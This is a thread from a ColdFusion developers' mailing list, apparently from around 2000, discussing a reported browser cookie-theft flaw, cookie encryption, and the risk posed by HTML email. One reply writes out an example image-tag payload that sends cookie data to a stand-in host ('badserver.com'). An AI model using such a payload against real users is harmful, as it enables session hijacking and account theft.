That's already been done by other means... I believe that embedding
"<img src="http://badserver.com/grabcookies.cfm?[EMAIL PROTECTED]>"
will work if you read mail while online...
David
Chris Giminez wrote:
>
> But what good is an encrypted cookie?
>
> If I have a cookie on my machine that automatically logs me in to Amazon's one
>click, for example,
> encryption is irrelevant if some hacker steals it and installs it as their own. Next
>time they go to
> Amazon, they're me; encryption or not.
>
> What's scary about this is that you can only get your cookies "grabbed" by visiting
>a site that is
> trying to grab it, right? Well, what about an html email being read? Same thing as
>visiting a site,
> right? I would imagine a cookie grabbing script could be embedded in a typical html
>spam just as
> easily.
>
> Chris Giminez
>
> > In the page submitted by Todd:
> > "The NY Times said it has rewritten its cookies code with stronger
> > encryption..."
> >
> > Certainly no one on this list would steal anyone's cookies <grin>, but I
> > didn't hear anyone mention the possibility of encrypting one's own
> > cookies to protect their contents. This is possible, isn't it?
> >
> > --John Allred
> >
> >
> > Todd Ashworth wrote:
> > >
> > > Might want to be extra carefull what you store in your cookies from now on,
> > > ladies and gents. Or .. if you are the naughty kind of CF developer, I
> > > suppose you could take advantage of this ...
> > >
> > > http://www.cnnfn.com/2000/05/16/technology/microsoft_browser/
> > >
> > > .Todd
> > >
> > > ------------------------------------------------------------------------------
> > > Archives: http://www.eGroups.com/list/cf-talk
> > > To Unsubscribe visit
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
> send a message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
> >
> > --
> > John Allred / Jackson, Mississippi
> > Webmaster, Mississippi Counties
> > http://www.mscounties.com/
> > ------------------------------------------------------------------------------
> > Archives: http://www.eGroups.com/list/cf-talk
> > To Unsubscribe visit
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
> send a message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
> >
>
> ------------------------------------------------------------------------------
> Archives: http://www.eGroups.com/list/cf-talk
> To Unsubscribe visit
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a
>message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
------------------------------------------------------------------------------
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
